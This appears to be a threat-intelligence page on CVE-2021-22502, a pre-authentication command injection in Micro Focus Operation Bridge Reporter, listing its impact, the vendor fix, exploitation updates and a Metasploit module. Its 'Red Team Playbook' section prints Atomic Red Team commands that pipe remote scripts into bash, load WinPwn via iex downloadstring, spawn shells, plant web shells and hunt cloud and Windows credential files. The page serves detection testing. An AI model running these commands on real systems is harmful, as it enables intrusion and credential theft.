CVE-2021-22502
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the Operation Bridge Reporter (OBR) server's administrative API. Specifically, the POST endpoint /AdminService/urest/v1/LogonResource fails to sanitize user-supplied data in the 'userName' parameter, allowing shell commands to be injected and executed. The affected component is the OBR 10.40 server's authentication service interface handling logon requests.
Vulnerability Description
Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.
Impact
An unauthenticated attacker can execute arbitrary system commands on the Operation Bridge Reporter server, resulting in complete control over the affected system. This includes the ability to deploy malware, exfiltrate sensitive monitoring data, modify or delete information, and disrupt monitoring operations. No user interaction or credentials are required to exploit this flaw, enabling remote attackers to achieve full system compromise and potentially pivot within the network environment.
Solution
Micro Focus has released a security advisory (KM03775947) addressing this issue in Operation Bridge Reporter version 10.40. Users should apply the vendor-provided patches as detailed in the advisory at https://softwaresupport.softwaregrp.com/doc/KM03775947. It is recommended to follow the vendor’s update instructions promptly to remediate the command injection vulnerability and mitigate associated risks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The remote code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) version 10.40 presents a significant security risk due to its ability to allow unauthorized execution of arbitrary code on the server. This vulnerability arises from improper input validation, which can be exploited by an attacker to send crafted requests to the OBR server. When these requests are processed, they can lead to the execution of malicious code with the same privileges as the OBR application. The lack of sufficient safeguards to validate and sanitize user inputs creates a pathway for attackers to manipulate the application’s behavior, ultimately compromising the integrity and confidentiality of the system.
Attack vectors for this vulnerability are primarily network-based, allowing remote attackers to exploit the flaw without needing physical access to the affected system. An attacker could leverage various methods, such as sending specially crafted HTTP requests or utilizing automated scripts to probe for the vulnerability. Once the attacker successfully exploits the vulnerability, they can execute arbitrary commands, potentially leading to full system compromise. This could involve deploying malware, exfiltrating sensitive data, or using the compromised server as a launching point for further attacks within the network. The ease of exploitation combined with the remote nature of the attack makes this vulnerability particularly concerning for organizations relying on the OBR product for operational reporting and monitoring.
The real-world impact of this vulnerability is substantial, especially for organizations that utilize Micro Focus Operation Bridge Reporter for critical business operations. A successful exploitation could lead to severe consequences, including data breaches, loss of sensitive information, and disruption of services. The business risk extends beyond immediate financial losses; it can also damage an organization’s reputation and erode customer trust. Furthermore, regulatory implications could arise if sensitive data is compromised, leading to potential fines and legal repercussions. The high CVSS score of 9.8 underscores the critical nature of this vulnerability and the urgent need for remediation.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in the OBR deployment. Additionally, organizations should ensure that they are running the latest version of the software, as vendors typically release patches to address known vulnerabilities. Network segmentation can also be employed to limit access to the OBR server, reducing the attack surface. Implementing robust intrusion detection systems (IDS) can help monitor for unusual activity indicative of exploitation attempts. Furthermore, organizations should establish an incident response plan to quickly address any potential breaches resulting from this vulnerability.
In conclusion, the remote code execution vulnerability in Micro Focus Operation Bridge Reporter poses a critical threat to organizations that depend on this software for their operational needs. The potential for exploitation through remote attacks, combined with the severe implications for business operations and data security, necessitates immediate attention. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their risk exposure and protect their assets from malicious actors seeking to exploit this vulnerability.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the critical remote code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR). While the overall exploit activity remains steady, this modest uptick in telemetry suggests persistent adversary interest, particularly given the availability of a Metasploit module that facilitates pre-authentication command injection on affected Linux versions. The EPSS score remains high but shows a marginal decline, indicating that although the likelihood of exploitation is still significant, the momentum of attack campaigns has plateaued rather than accelerated. This nuanced shift underscores the importance of continuous monitoring, as threat actors maintain capabilities to leverage this vulnerability with minimal complexity. Consequently, the risk level remains critical, reflecting the vulnerability’s ease of exploitation and potential impact on operational environments.
Update 2 — May 23, 2026
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2021-22502, reflected by a marked increase in telemetry activity. This uptick coincides with a slight rise in the EPSS score, indicating a growing likelihood of successful exploitation in operational environments. The emergence of a publicly available Metasploit module that enables pre-authentication command injection on affected Linux versions continues to lower the barrier for threat actors, facilitating more frequent and opportunistic attacks. While ransomware involvement remains unconfirmed, the increased exploitation activity elevates the risk of severe operational disruption and data compromise. Consequently, the threat level for this vulnerability remains critical, with the recent developments underscoring the necessity for heightened vigilance and continuous monitoring.
Update 3 — June 07, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the CVE-2021-22502 vulnerability in Micro Focus Operation Bridge Reporter. This uptick, while moderate, reflects a sustained interest by threat actors in leveraging the publicly available Metasploit module that facilitates pre-authentication command injection on affected Linux versions. The persistence of these attempts underscores the vulnerability’s continued appeal as an attack vector, particularly given the ease of exploitation and the critical severity rating. Although ransomware usage linked to this vulnerability remains unconfirmed, the growing exploitation activity heightens the risk of unauthorized access and potential operational disruption. Consequently, the threat level remains critical, with the recent telemetry trends reinforcing the necessity for ongoing vigilance and proactive detection efforts.
Update 4 — July 05, 2026
CSURFACE threat intelligence has detected a discernible uptick in exploitation attempts targeting the Micro Focus Operation Bridge Reporter vulnerability, reflecting a sustained and growing adversary interest. This increase in activity, while moderate, signals that threat actors continue to prioritize this vector due to its straightforward exploitation path and pre-authentication command injection capability. The availability of a Metasploit module further lowers the barrier for attackers, potentially broadening the pool of less sophisticated actors able to leverage this flaw. Although ransomware deployment linked to this vulnerability remains unconfirmed, the persistent and rising exploitation attempts elevate the risk of unauthorized system compromise and operational impact. Consequently, the threat level associated with CVE-2021-22502 remains critical, underscoring the imperative for defenders to maintain heightened detection and response postures in environments running affected versions.
Update 5 — July 14, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-22502, consistent with ongoing attacker interest in this critical remote code execution vulnerability. While the overall trend remains stable, the uptick in activity suggests persistent adversary efforts to leverage the publicly available Metasploit module, which continues to lower the technical barrier for exploitation. Our telemetry indicates that these attempts are primarily focused on unauthenticated command injection vectors on vulnerable Micro Focus Operation Bridge Reporter instances. Although there is still no confirmed linkage to ransomware campaigns, the sustained and incremental rise in exploitation attempts underscores the continued risk of unauthorized access and potential operational disruption. This evolving landscape reinforces the critical threat level of CVE-2021-22502, emphasizing that defenders must remain vigilant as adversaries maintain active interest and capability to exploit this flaw.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microfocus | Operation Bridge Reporter | 10.40 |
cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Micro Focus Operations Bridge Reporter Unauthenticated Command Injection
exploits/linux/http/microfocus_obr_cmd_injection
|
- | Unknown | - | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
43%
|
Medium | High | |
| CAPEC-88 | OS Command Injection |
41%
|
High | High | |
| CAPEC-6 | Argument Injection |
40%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-22502 |
| softwaresupport.softwaregrp.com |
GitHub CVE
x_refsource_MISC
|
https://softwaresupport.softwaregrp.com/doc/KM03775947 |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-21-153/ |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-21-154/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/162408/Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22502 |